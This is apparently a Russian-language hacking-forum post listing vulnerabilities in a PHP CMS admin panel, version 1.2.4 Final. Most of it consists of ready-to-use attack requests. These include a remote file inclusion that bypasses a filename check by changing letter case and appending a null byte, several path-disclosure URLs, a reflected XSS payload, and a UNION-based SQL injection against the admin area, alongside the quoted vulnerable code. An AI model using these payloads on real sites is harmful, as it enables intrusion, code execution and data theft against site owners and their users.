Версия: 1.2.4 Final
RFI(register globals = on и, как я понял, сервер на винде, тк в Юникс системах регистр имеет значение):
/manager/tools/link/dbinstall.PhP?_PX_config[manager_path]=path%00
Уязвимый код:
PHP код:
if (basename($_SERVER['SCRIPT_NAME']) == 'dbinstall.php') exit;
include $_PX_config[manager_path] . "/path/lib/";
Саму идею обойти защиту путём изменения регистра предложили в этом посту: https://forum.antichat.ru/showpost.php?p=1704870&postcount=234 , однако порой этот файл редактируют, а ведь точно такая же уязвимость есть и в файле, указанном выше.
Раскрытия путей:
В папке ../manager/tools/* в каждой папке выдает ошибку, связанную с тем, что они используют функции, определённый в файлах, которые их подключают.
../manager/help.php?c[]=article&mode=
../manager/users.php?user_id[]=1
../manager/comments.php?op=all'
XSS(passive):
../manager/tools/visualedit/index.php?msg="><sCript>alert(111);</sCript>
SQL-иньекция(админка):
../manager/tools.php?p=link&id=-4+union+select+1,2,3,4,5,6,7&page=edit_link
Также можно узнать версию движка, обратившись к файлу, указанному ниже:
../manager/VERSION